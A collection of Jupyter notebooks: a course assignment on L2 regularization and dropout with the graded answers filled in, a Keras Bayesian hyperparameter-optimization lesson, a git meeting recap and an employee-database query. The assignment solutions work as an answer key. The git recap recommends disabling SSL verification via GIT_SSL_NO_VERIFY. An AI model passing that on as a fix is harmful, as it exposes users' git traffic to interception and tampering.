# Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.
if keep_prob == 1:
a3, cache = forward_propagation(X, parameters)
elif keep_prob < 1:
a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)
# Cost function
if lambd == 0:
cost = compute_cost(a3, Y)
else:
cost = compute_cost_with_regularization(a3, Y, parameters, lambd)
# Backward propagation.
assert(lambd==0 or keep_prob==1) # it is possible to use both L2 regularization and dropout,
# but this assignment will only explore one at a time
if lambd == 0 and keep_prob == 1:
grads = backward_propagation(X, Y, cache)
elif lambd != 0:
grads = backward_propagation_with_regularization(X, Y, cache, lambd)
elif keep_prob < 1:
grads = backward_propagation_with_dropout(X, Y, cache, keep_prob)
# Update parameters.
parameters = update_parameters(parameters, grads, learning_rate)
# Print the loss every 10000 iterations
if print_cost and i % 10000 == 0:
print("Cost after iteration {}: {}".format(i, cost))
if print_cost and i % 1000 == 0:
costs.append(cost)
# plot the cost
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (x1,000)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
return parameters
```
Let's train the model without any regularization, and observe the accuracy on the train/test sets.
```
parameters = model(train_X, train_Y)
print ("On the training set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
The train accuracy is 94.8% while the test accuracy is 91.5%. This is the **baseline model** (you will observe the impact of regularization on this model). Run the following code to plot the decision boundary of your model.
```
plt.title("Model without regularization")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
The non-regularized model is obviously overfitting the training set. It is fitting the noisy points! Lets now look at two techniques to reduce overfitting.
## 2 - L2 Regularization
The standard way to avoid overfitting is called **L2 regularization**. It consists of appropriately modifying your cost function, from:
$$J = -\frac{1}{m} \sum\limits_{i = 1}^{m} \large{(}\small y^{(i)}\log\left(a^{[L](i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right) \large{)} \tag{1}$$
To:
$$J_{regularized} = \small \underbrace{-\frac{1}{m} \sum\limits_{i = 1}^{m} \large{(}\small y^{(i)}\log\left(a^{[L](i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right) \large{)} }_\text{cross-entropy cost} + \underbrace{\frac{1}{m} \frac{\lambda}{2} \sum\limits_l\sum\limits_k\sum\limits_j W_{k,j}^{[l]2} }_\text{L2 regularization cost} \tag{2}$$
Let's modify your cost and observe the consequences.
**Exercise**: Implement `compute_cost_with_regularization()` which computes the cost given by formula (2). To calculate $\sum\limits_k\sum\limits_j W_{k,j}^{[l]2}$ , use :
```python
np.sum(np.square(Wl))
```
Note that you have to do this for $W^{[1]}$, $W^{[2]}$ and $W^{[3]}$, then sum the three terms and multiply by $ \frac{1}{m} \frac{\lambda}{2} $.
```
# GRADED FUNCTION: compute_cost_with_regularization
def compute_cost_with_regularization(A3, Y, parameters, lambd):
"""
Implement the cost function with L2 regularization. See formula (2) above.
Arguments:
A3 -- post-activation, output of forward propagation, of shape (output size, number of examples)
Y -- "true" labels vector, of shape (output size, number of examples)
parameters -- python dictionary containing parameters of the model
Returns:
cost - value of the regularized loss function (formula (2))
"""
m = Y.shape[1]
W1 = parameters["W1"]
W2 = parameters["W2"]
W3 = parameters["W3"]
cross_entropy_cost = compute_cost(A3, Y) # This gives you the cross-entropy part of the cost
### START CODE HERE ### (approx. 1 line)
L2_regularization_cost=(np.sum(np.square(W1))+np.sum(np.square(W2))+np.sum(np.square(W3)))*lambd/(2*m)
### END CODER HERE ###
cost = cross_entropy_cost + L2_regularization_cost
return cost
A3, Y_assess, parameters = compute_cost_with_regularization_test_case()
print("cost = " + str(compute_cost_with_regularization(A3, Y_assess, parameters, lambd = 0.1)))
```
**Expected Output**:
<table>
<tr>
<td>
**cost**
</td>
<td>
1.78648594516
</td>
</tr>
</table>
Of course, because you changed the cost, you have to change backward propagation as well! All the gradients have to be computed with respect to this new cost.
**Exercise**: Implement the changes needed in backward propagation to take into account regularization. The changes only concern dW1, dW2 and dW3. For each, you have to add the regularization term's gradient ($\frac{d}{dW} ( \frac{1}{2}\frac{\lambda}{m} W^2) = \frac{\lambda}{m} W$).
```
# GRADED FUNCTION: backward_propagation_with_regularization
def backward_propagation_with_regularization(X, Y, cache, lambd):
"""
Implements the backward propagation of our baseline model to which we added an L2 regularization.
Arguments:
X -- input dataset, of shape (input size, number of examples)
Y -- "true" labels vector, of shape (output size, number of examples)
cache -- cache output from forward_propagation()
lambd -- regularization hyperparameter, scalar
Returns:
gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables
"""
m = X.shape[1]
(Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache
dZ3 = A3 - Y
### START CODE HERE ### (approx. 1 line)
dW3 = (dZ3@A2.T )/m + lambd/m*W3
### END CODE HERE ###
db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)
dA2 = np.dot(W3.T, dZ3)
dZ2 = np.multiply(dA2, np.int64(A2 > 0))
### START CODE HERE ### (approx. 1 line)
dW2 = (dZ2@A1.T )/m + lambd/m*W2
### END CODE HERE ###
db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)
dA1 = np.dot(W2.T, dZ2)
dZ1 = np.multiply(dA1, np.int64(A1 > 0))
### START CODE HERE ### (approx. 1 line)
dW1 = (dZ1@X.T )/m + lambd/m*W1
### END CODE HERE ###
db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)
gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3,"dA2": dA2,
"dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1,
"dZ1": dZ1, "dW1": dW1, "db1": db1}
return gradients
X_assess, Y_assess, cache = backward_propagation_with_regularization_test_case()
grads = backward_propagation_with_regularization(X_assess, Y_assess, cache, lambd = 0.7)
print ("dW1 = \n"+ str(grads["dW1"]))
print ("dW2 = \n"+ str(grads["dW2"]))
print ("dW3 = \n"+ str(grads["dW3"]))
```
**Expected Output**:
```
dW1 =
[[-0.25604646 0.12298827 -0.28297129]
[-0.17706303 0.34536094 -0.4410571 ]]
dW2 =
[[ 0.79276486 0.85133918]
[-0.0957219 -0.01720463]
[-0.13100772 -0.03750433]]
dW3 =
[[-1.77691347 -0.11832879 -0.09397446]]
```
Let's now run the model with L2 regularization $(\lambda = 0.7)$. The `model()` function will call:
- `compute_cost_with_regularization` instead of `compute_cost`
- `backward_propagation_with_regularization` instead of `backward_propagation`
```
parameters = model(train_X, train_Y, lambd = 0.7)
print ("On the train set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
Congrats, the test set accuracy increased to 93%. You have saved the French football team!
You are not overfitting the training data anymore. Let's plot the decision boundary.
```
plt.title("Model with L2-regularization")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
**Observations**:
- The value of $\lambda$ is a hyperparameter that you can tune using a dev set.
- L2 regularization makes your decision boundary smoother. If $\lambda$ is too large, it is also possible to "oversmooth", resulting in a model with high bias.
**What is L2-regularization actually doing?**:
L2-regularization relies on the assumption that a model with small weights is simpler than a model with large weights. Thus, by penalizing the square values of the weights in the cost function you drive all the weights to smaller values. It becomes too costly for the cost to have large weights! This leads to a smoother model in which the output changes more slowly as the input changes.
<font color='blue'>
**What you should remember** -- the implications of L2-regularization on:
- The cost computation:
- A regularization term is added to the cost
- The backpropagation function:
- There are extra terms in the gradients with respect to weight matrices
- Weights end up smaller ("weight decay"):
- Weights are pushed to smaller values.
## 3 - Dropout
Finally, **dropout** is a widely used regularization technique that is specific to deep learning.
**It randomly shuts down some neurons in each iteration.** Watch these two videos to see what this means!
<!--
To understand drop-out, consider this conversation with a friend:
- Friend: "Why do you need all these neurons to train your network and classify images?".
- You: "Because each neuron contains a weight and can learn specific features/details/shape of an image. The more neurons I have, the more featurse my model learns!"
- Friend: "I see, but are you sure that your neurons are learning different features and not all the same features?"
- You: "Good point... Neurons in the same layer actually don't talk to each other. It should be definitly possible that they learn the same image features/shapes/forms/details... which would be redundant. There should be a solution."
!-->
<center>
<video width="620" height="440" src="images/dropout1_kiank.mp4" type="video/mp4" controls>
</video>
</center>
<br>
<caption><center> <u> Figure 2 </u>: Drop-out on the second hidden layer. <br> At each iteration, you shut down (= set to zero) each neuron of a layer with probability $1 - keep\_prob$ or keep it with probability $keep\_prob$ (50% here). The dropped neurons don't contribute to the training in both the forward and backward propagations of the iteration. </center></caption>
<center>
<video width="620" height="440" src="images/dropout2_kiank.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> <u> Figure 3 </u>: Drop-out on the first and third hidden layers. <br> $1^{st}$ layer: we shut down on average 40% of the neurons. $3^{rd}$ layer: we shut down on average 20% of the neurons. </center></caption>
When you shut some neurons down, you actually modify your model. The idea behind drop-out is that at each iteration, you train a different model that uses only a subset of your neurons. With dropout, your neurons thus become less sensitive to the activation of one other specific neuron, because that other neuron might be shut down at any time.
### 3.1 - Forward propagation with dropout
**Exercise**: Implement the forward propagation with dropout. You are using a 3 layer neural network, and will add dropout to the first and second hidden layers. We will not apply dropout to the input layer or output layer.
**Instructions**:
You would like to shut down some neurons in the first and second layers. To do that, you are going to carry out 4 Steps:
1. In lecture, we dicussed creating a variable $d^{[1]}$ with the same shape as $a^{[1]}$ using `np.random.rand()` to randomly get numbers between 0 and 1. Here, you will use a vectorized implementation, so create a random matrix $D^{[1]} = [d^{[1](1)} d^{[1](2)} ... d^{[1](m)}] $ of the same dimension as $A^{[1]}$.
2. Set each entry of $D^{[1]}$ to be 1 with probability (`keep_prob`), and 0 otherwise.
**Hint:** Let's say that keep_prob = 0.8, which means that we want to keep about 80% of the neurons and drop out about 20% of them. We want to generate a vector that has 1's and 0's, where about 80% of them are 1 and about 20% are 0.
This python statement:
`X = (X < keep_prob).astype(int)`
is conceptually the same as this if-else statement (for the simple case of a one-dimensional array) :
```
for i,v in enumerate(x):
if v < keep_prob:
x[i] = 1
else: # v >= keep_prob
x[i] = 0
```
Note that the `X = (X < keep_prob).astype(int)` works with multi-dimensional arrays, and the resulting output preserves the dimensions of the input array.
Also note that without using `.astype(int)`, the result is an array of booleans `True` and `False`, which Python automatically converts to 1 and 0 if we multiply it with numbers. (However, it's better practice to convert data into the data type that we intend, so try using `.astype(int)`.)
3. Set $A^{[1]}$ to $A^{[1]} * D^{[1]}$. (You are shutting down some neurons). You can think of $D^{[1]}$ as a mask, so that when it is multiplied with another matrix, it shuts down some of the values.
4. Divide $A^{[1]}$ by `keep_prob`. By doing this you are assuring that the result of the cost will still have the same expected value as without drop-out. (This technique is also called inverted dropout.)
```
# GRADED FUNCTION: forward_propagation_with_dropout
def forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):
"""
Implements the forward propagation: LINEAR -> RELU + DROPOUT -> LINEAR -> RELU + DROPOUT -> LINEAR -> SIGMOID.
Arguments:
X -- input dataset, of shape (2, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3":
W1 -- weight matrix of shape (20, 2)
b1 -- bias vector of shape (20, 1)
W2 -- weight matrix of shape (3, 20)
b2 -- bias vector of shape (3, 1)
W3 -- weight matrix of shape (1, 3)
b3 -- bias vector of shape (1, 1)
keep_prob - probability of keeping a neuron active during drop-out, scalar
Returns:
A3 -- last activation value, output of the forward propagation, of shape (1,1)
cache -- tuple, information stored for computing the backward propagation
"""
np.random.seed(1)
# retrieve parameters
W1 = parameters["W1"]
b1 = parameters["b1"]
W2 = parameters["W2"]
b2 = parameters["b2"]
W3 = parameters["W3"]
b3 = parameters["b3"]
# LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID
Z1 = np.dot(W1, X) + b1
A1 = relu(Z1)
### START CODE HERE ### (approx. 4 lines) # Steps 1-4 below correspond to the Steps 1-4 described above.
D1 = np.random.rand(A1.shape[0],A1.shape[1]) # Step 1: initialize matrix D1 = np.random.rand(..., ...)
D1=(D1< keep_prob).astype(int) # Step 2: convert entries of D1 to 0 or 1 (using keep_prob as the threshold)
A1=A1*D1
A1=A1/keep_prob # Step 4: scale the value of neurons that haven't been shut down
### END CODE HERE ###
Z2 = np.dot(W2, A1) + b2
A2 = relu(Z2)
### START CODE HERE ### (approx. 4 lines)
D2 = np.random.rand(A2.shape[0],A2.shape[1]) # Step 1: initialize matrix D2 = np.random.rand(..., ...)
D2=(D2< keep_prob).astype(int) # Step 2: convert entries of D2 to 0 or 1 (using keep_prob as the threshold)
A2=A2*D2 # Step 3: shut down some neurons of A2
A2=A2/keep_prob # Step 4: scale the value of neurons that haven't been shut down
### END CODE HERE ###
Z3 = np.dot(W3, A2) + b3
A3 = sigmoid(Z3)
cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)
return A3, cache
X_assess, parameters = forward_propagation_with_dropout_test_case()
A3, cache = forward_propagation_with_dropout(X_assess, parameters, keep_prob = 0.7)
print ("A3 = " + str(A3))
```
**Expected Output**:
<table>
<tr>
<td>
**A3**
</td>
<td>
[[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]
</td>
</tr>
</table>
### 3.2 - Backward propagation with dropout
**Exercise**: Implement the backward propagation with dropout. As before, you are training a 3 layer network. Add dropout to the first and second hidden layers, using the masks $D^{[1]}$ and $D^{[2]}$ stored in the cache.
**Instruction**:
Backpropagation with dropout is actually quite easy. You will have to carry out 2 Steps:
1. You had previously shut down some neurons during forward propagation, by applying a mask $D^{[1]}$ to `A1`. In backpropagation, you will have to shut down the same neurons, by reapplying the same mask $D^{[1]}$ to `dA1`.
2. During forward propagation, you had divided `A1` by `keep_prob`. In backpropagation, you'll therefore have to divide `dA1` by `keep_prob` again (the calculus interpretation is that if $A^{[1]}$ is scaled by `keep_prob`, then its derivative $dA^{[1]}$ is also scaled by the same `keep_prob`).
```
# GRADED FUNCTION: backward_propagation_with_dropout
def backward_propagation_with_dropout(X, Y, cache, keep_prob):
"""
Implements the backward propagation of our baseline model to which we added dropout.
Arguments:
X -- input dataset, of shape (2, number of examples)
Y -- "true" labels vector, of shape (output size, number of examples)
cache -- cache output from forward_propagation_with_dropout()
keep_prob - probability of keeping a neuron active during drop-out, scalar
Returns:
gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables
"""
m = X.shape[1]
(Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache
dZ3 = A3 - Y
dW3 = 1./m * np.dot(dZ3, A2.T)
db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)
dA2 = np.dot(W3.T, dZ3)
### START CODE HERE ### (≈ 2 lines of code)
dA2=dA2*D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation
dA2=dA2/keep_prob # Step 2: Scale the value of neurons that haven't been shut down
### END CODE HERE ###
dZ2 = np.multiply(dA2, np.int64(A2 > 0))
dW2 = 1./m * np.dot(dZ2, A1.T)
db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)
dA1 = np.dot(W2.T, dZ2)
### START CODE HERE ### (≈ 2 lines of code)
dA1=dA1*D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation
dA1=dA1/keep_prob # Step 2: Scale the value of neurons that haven't been shut down
### END CODE HERE ###
dZ1 = np.multiply(dA1, np.int64(A1 > 0))
dW1 = 1./m * np.dot(dZ1, X.T)
db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)
gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3,"dA2": dA2,
"dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1,
"dZ1": dZ1, "dW1": dW1, "db1": db1}
return gradients
X_assess, Y_assess, cache = backward_propagation_with_dropout_test_case()
gradients = backward_propagation_with_dropout(X_assess, Y_assess, cache, keep_prob = 0.8)
print ("dA1 = \n" + str(gradients["dA1"]))
print ("dA2 = \n" + str(gradients["dA2"]))
```
**Expected Output**:
```
dA1 =
[[ 0.36544439 0. -0.00188233 0. -0.17408748]
[ 0.65515713 0. -0.00337459 0. -0. ]]
dA2 =
[[ 0.58180856 0. -0.00299679 0. -0.27715731]
[ 0. 0.53159854 -0. 0.53159854 -0.34089673]
[ 0. 0. -0.00292733 0. -0. ]]
```
Let's now run the model with dropout (`keep_prob = 0.86`). It means at every iteration you shut down each neurons of layer 1 and 2 with 14% probability. The function `model()` will now call:
- `forward_propagation_with_dropout` instead of `forward_propagation`.
- `backward_propagation_with_dropout` instead of `backward_propagation`.
```
parameters = model(train_X, train_Y, keep_prob = 0.86, learning_rate = 0.3)
print ("On the train set:")
predictions_train = predict(train_X, train_Y, parameters)
print ("On the test set:")
predictions_test = predict(test_X, test_Y, parameters)
```
Dropout works great! The test accuracy has increased again (to 95%)! Your model is not overfitting the training set and does a great job on the test set. The French football team will be forever grateful to you!
Run the code below to plot the decision boundary.
```
plt.title("Model with dropout")
axes = plt.gca()
axes.set_xlim([-0.75,0.40])
axes.set_ylim([-0.75,0.65])
plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)
```
**Note**:
- A **common mistake** when using dropout is to use it both in training and testing. You should use dropout (randomly eliminate nodes) only in training.
- Deep learning frameworks like [tensorflow](https://www.tensorflow.org/api_docs/python/tf/nn/dropout), [PaddlePaddle](http://doc.paddlepaddle.org/release_doc/0.9.0/doc/ui/api/trainer_config_helpers/attrs.html), [keras](https://keras.io/layers/core/#dropout) or [caffe](http://caffe.berkeleyvision.org/tutorial/layers/dropout.html) come with a dropout layer implementation. Don't stress - you will soon learn some of these frameworks.
<font color='blue'>
**What you should remember about dropout:**
- Dropout is a regularization technique.
- You only use dropout during training. Don't use dropout (randomly eliminate nodes) during test time.
- Apply dropout both during forward and backward propagation.
- During training time, divide each dropout layer by keep_prob to keep the same expected value for the activations. For example, if keep_prob is 0.5, then we will on average shut down half the nodes, so the output will be scaled by 0.5 since only the remaining half are contributing to the solution. Dividing by 0.5 is equivalent to multiplying by 2. Hence, the output now has the same expected value. You can check that this works even when keep_prob is other values than 0.5.
## 4 - Conclusions
**Here are the results of our three models**:
<table>
<tr>
<td>
**model**
</td>
<td>
**train accuracy**
</td>
<td>
**test accuracy**
</td>
</tr>
<td>
3-layer NN without regularization
</td>
<td>
95%
</td>
<td>
91.5%
</td>
<tr>
<td>
3-layer NN with L2-regularization
</td>
<td>
94%
</td>
<td>
93%
</td>
</tr>
<tr>
<td>
3-layer NN with dropout
</td>
<td>
93%
</td>
<td>
95%
</td>
</tr>
</table>
Note that regularization hurts training set performance! This is because it limits the ability of the network to overfit to the training set. But since it ultimately gives better test accuracy, it is helping your system.
Congratulations for finishing this assignment! And also for revolutionizing French football. :-)
<font color='blue'>
**What we want you to remember from this notebook**:
- Regularization will help you reduce overfitting.
- Regularization will drive your weights to lower values.
- L2 regularization and Dropout are two very effective regularization techniques.
|
github_jupyter
|
<a href="https://colab.research.google.com/github/jeffheaton/t81_558_deep_learning/blob/master/t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# T81-558: Applications of Deep Neural Networks
**Module 8: Kaggle Data Sets**
* Instructor: [Jeff Heaton](https://sites.wustl.edu/jeffheaton/), McKelvey School of Engineering, [Washington University in St. Louis](https://engineering.wustl.edu/Programs/Pages/default.aspx)
* For more information visit the [class website](https://sites.wustl.edu/jeffheaton/t81-558/).
# Module 8 Material
* Part 8.1: Introduction to Kaggle [[Video]](https://www.youtube.com/watch?v=v4lJBhdCuCU&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_1_kaggle_intro.ipynb)
* Part 8.2: Building Ensembles with Scikit-Learn and Keras [[Video]](https://www.youtube.com/watch?v=LQ-9ZRBLasw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_2_keras_ensembles.ipynb)
* Part 8.3: How Should you Architect Your Keras Neural Network: Hyperparameters [[Video]](https://www.youtube.com/watch?v=1q9klwSoUQw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_3_keras_hyperparameters.ipynb)
* **Part 8.4: Bayesian Hyperparameter Optimization for Keras** [[Video]](https://www.youtube.com/watch?v=sXdxyUCCm8s&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb)
* Part 8.5: Current Semester's Kaggle [[Video]](https://www.youtube.com/watch?v=48OrNYYey5E) [[Notebook]](t81_558_class_08_5_kaggle_project.ipynb)
# Google CoLab Instructions
The following code ensures that Google CoLab is running the correct version of TensorFlow.
```
# Startup Google CoLab
try:
%tensorflow_version 2.x
COLAB = True
print("Note: using Google CoLab")
except:
print("Note: not using Google CoLab")
COLAB = False
# Nicely formatted time string
def hms_string(sec_elapsed):
h = int(sec_elapsed / (60 * 60))
m = int((sec_elapsed % (60 * 60)) / 60)
s = sec_elapsed % 60
return "{}:{:>02}:{:>05.2f}".format(h, m, s)
```
# Part 8.4: Bayesian Hyperparameter Optimization for Keras
Snoek, J., Larochelle, H., & Adams, R. P. (2012). [Practical bayesian optimization of machine learning algorithms](https://arxiv.org/pdf/1206.2944.pdf). In *Advances in neural information processing systems* (pp. 2951-2959).
* [bayesian-optimization](https://github.com/fmfn/BayesianOptimization)
* [hyperopt](https://github.com/hyperopt/hyperopt)
* [spearmint](https://github.com/JasperSnoek/spearmint)
```
# Ignore useless W0819 warnings generated by TensorFlow 2.0. Hopefully can remove this ignore in the future.
# See https://github.com/tensorflow/tensorflow/issues/31308
import logging, os
logging.disable(logging.WARNING)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
import pandas as pd
from scipy.stats import zscore
# Read the data set
df = pd.read_csv(
"https://data.heatonresearch.com/data/t81-558/jh-simple-dataset.csv",
na_values=['NA','?'])
# Generate dummies for job
df = pd.concat([df,pd.get_dummies(df['job'],prefix="job")],axis=1)
df.drop('job', axis=1, inplace=True)
# Generate dummies for area
df = pd.concat([df,pd.get_dummies(df['area'],prefix="area")],axis=1)
df.drop('area', axis=1, inplace=True)
# Missing values for income
med = df['income'].median()
df['income'] = df['income'].fillna(med)
# Standardize ranges
df['income'] = zscore(df['income'])
df['aspect'] = zscore(df['aspect'])
df['save_rate'] = zscore(df['save_rate'])
df['age'] = zscore(df['age'])
df['subscriptions'] = zscore(df['subscriptions'])
# Convert to numpy - Classification
x_columns = df.columns.drop('product').drop('id')
x = df[x_columns].values
dummies = pd.get_dummies(df['product']) # Classification
products = dummies.columns
y = dummies.values
import pandas as pd
import os
import numpy as np
import time
import tensorflow.keras.initializers
import statistics
import tensorflow.keras
from sklearn import metrics
from sklearn.model_selection import StratifiedKFold
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Dropout, InputLayer
from tensorflow.keras import regularizers
from tensorflow.keras.callbacks import EarlyStopping
from sklearn.model_selection import StratifiedShuffleSplit
from tensorflow.keras.layers import LeakyReLU,PReLU
from tensorflow.keras.optimizers import Adam
def generate_model(dropout, neuronPct, neuronShrink):
# We start with some percent of 5000 starting neurons on the first hidden layer.
neuronCount = int(neuronPct * 5000)
# Construct neural network
# kernel_initializer = tensorflow.keras.initializers.he_uniform(seed=None)
model = Sequential()
# So long as there would have been at least 25 neurons and fewer than 10
# layers, create a new layer.
layer = 0
while neuronCount>25 and layer<10:
# The first (0th) layer needs an input input_dim(neuronCount)
if layer==0:
model.add(Dense(neuronCount,
input_dim=x.shape[1],
activation=PReLU()))
else:
model.add(Dense(neuronCount, activation=PReLU()))
layer += 1
# Add dropout after each hidden layer
model.add(Dropout(dropout))
# Shrink neuron count for each layer
neuronCount = neuronCount * neuronShrink
model.add(Dense(y.shape[1],activation='softmax')) # Output
return model
# Generate a model and see what the resulting structure looks like.
model = generate_model(dropout=0.2, neuronPct=0.1, neuronShrink=0.25)
model.summary()
def evaluate_network(dropout,lr,neuronPct,neuronShrink):
SPLITS = 2
# Bootstrap
boot = StratifiedShuffleSplit(n_splits=SPLITS, test_size=0.1)
# Track progress
mean_benchmark = []
epochs_needed = []
num = 0
# Loop through samples
for train, test in boot.split(x,df['product']):
start_time = time.time()
num+=1
# Split train and test
x_train = x[train]
y_train = y[train]
x_test = x[test]
y_test = y[test]
model = generate_model(dropout, neuronPct, neuronShrink)
model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=lr))
monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3,
patience=100, verbose=0, mode='auto', restore_best_weights=True)
# Train on the bootstrap sample
model.fit(x_train,y_train,validation_data=(x_test,y_test),callbacks=[monitor],verbose=0,epochs=1000)
epochs = monitor.stopped_epoch
epochs_needed.append(epochs)
# Predict on the out of boot (validation)
pred = model.predict(x_test)
# Measure this bootstrap's log loss
y_compare = np.argmax(y_test,axis=1) # For log loss calculation
score = metrics.log_loss(y_compare, pred)
mean_benchmark.append(score)
m1 = statistics.mean(mean_benchmark)
m2 = statistics.mean(epochs_needed)
mdev = statistics.pstdev(mean_benchmark)
# Record this iteration
time_took = time.time() - start_time
#print(f"#{num}: score={score:.6f}, mean score={m1:.6f}, stdev={mdev:.6f}, epochs={epochs}, mean epochs={int(m2)}, time={hms_string(time_took)}")
tensorflow.keras.backend.clear_session()
return (-m1)
print(evaluate_network(
dropout=0.2,
lr=1e-3,
neuronPct=0.2,
neuronShrink=0.2))
from bayes_opt import BayesianOptimization
import time
# Supress NaN warnings, see: https://stackoverflow.com/questions/34955158/what-might-be-the-cause-of-invalid-value-encountered-in-less-equal-in-numpy
import warnings
warnings.filterwarnings("ignore",category =RuntimeWarning)
# Bounded region of parameter space
pbounds = {'dropout': (0.0, 0.499),
'lr': (0.0, 0.1),
'neuronPct': (0.01, 1),
'neuronShrink': (0.01, 1)
}
optimizer = BayesianOptimization(
f=evaluate_network,
pbounds=pbounds,
verbose=2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent
random_state=1,
)
start_time = time.time()
optimizer.maximize(init_points=10, n_iter=100,)
time_took = time.time() - start_time
print(f"Total runtime: {hms_string(time_took)}")
print(optimizer.max)
```
{'target': -0.6500334282952827, 'params': {'dropout': 0.12771198428037775, 'lr': 0.0074010841641111965, 'neuronPct': 0.10774655638231533, 'neuronShrink': 0.2784788676498257}}
|
github_jupyter
|
```
name = '2015-12-11-meeting-summary'
title = 'Introducing Git'
tags = 'git, github, version control'
author = 'Denis Sergeev'
from nb_tools import connect_notebook_to_post
from IPython.core.display import HTML
html = connect_notebook_to_post(name, title, tags, author)
```
Today we talked about git and its functionality for managing code, text documents and other building blocks of our research.
We followed a very good tutorial created by [**Software Carpentry**](http://swcarpentry.github.io/git-novice/). There are hundreds of other resources available online, for example, [**Git Real**](http://gitreal.codeschool.com/).
Hence, this post is not trying to be yet another git tutorial. Instead, below is just a brief recap of what commands were covered during the meeting.
## Setting Up Git
Set up your name and email so that each time you contribute to a project your commit has an author
`git config --global user.name "Python UEA"`
`git config --global user.email "python@uea.ac.uk"`
## Creating a Repository
Create a new directory for a project
`mkdir myproject`
Go into the newly created directory
`cd myproject`
Make the directory a Git repository
`git init`
Check status of the repository
`git status`
## Tracking Changes
Add a Python script to the repo (make the file staged for commit)
`git add awesome_script.py`
Commit changes with a meaningful message
`git commit -m "Add awesome script written in Python"`
## Exploring History
### Commits history
`git log`
### Comparing different versions of files
List all untracked changes in the repository
`git diff`
Differences with “head minus one”, i.e. previous, commit
`git diff HEAD~1 awesome_script.py`
Differences with a specific commit
`git diff <unique commit id> awesome_script.py`
## Ignoring Things
Create a .gitignore file and put '*.pyc' line in it telling git will to ignore all Python bytecode files
`echo '*.pyc' >> .gitignore`
Include .gitignore in the repository
`git add .gitignore`
`git commit -m "Add .gitignore file"`
`git status`
## Remotes in GitHub
`git remote add origin git@github.com:<username>/<repository_name>.git`
`git push -u origin master`
### Issue on Grace
If you use git on [Grace](http://rscs.uea.ac.uk/high-performance-computing) and have tried `git push` to a GitHub repository, you have probably encountered the following error:
`fatal: unable to access 'https://github.com/***/***/': error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm`
One of the possible solutions here is to switch off SSL verification by adding the following line in your .bashrc file:
`export GIT_SSL_NO_VERIFY=true`
```
HTML(html)
```
|
github_jupyter
|
# Observations
1. It appears the salaries are very high on the high end and very low at the low end.
2. Mimics the business model of a franchise restaurant where most of the lower end employees make minimum wage.
```
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Computed
from random import randint
import os
from dotenv import load_dotenv
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import scipy.stats as sts
# dialect+driver = 'postgres' for us, host probably = 'localhost' (for now), username defaults to 'postgres'
load_dotenv()
username=os.environ.get('DB_USERNAME')
password=os.environ.get('DB_PASSWORD')
connection_string= f'postgresql+psycopg2://{username}:{password}@localhost:5432/EmployeeDB'
def doQuery(query): # READ
return connection.execute(query).fetchall()
def doUpdate(updateQuery): # CREATE, UPDATE, DELETE
connection.execute(updateQuery)
connection = create_engine(connection_string).connect()
query = "select e.emp_no, e.emp_title_id, e.birthdate, e.first_name, e.last_name, e.sex, e.hire_date, t.title, s.salary \
from employee e, salary s, title t \
where e.emp_no = s.emp_no and \
e.emp_title_id = t.title_id"
queryResults = doQuery(query)
queryResults_df = pd.DataFrame(queryResults)
connection.close()
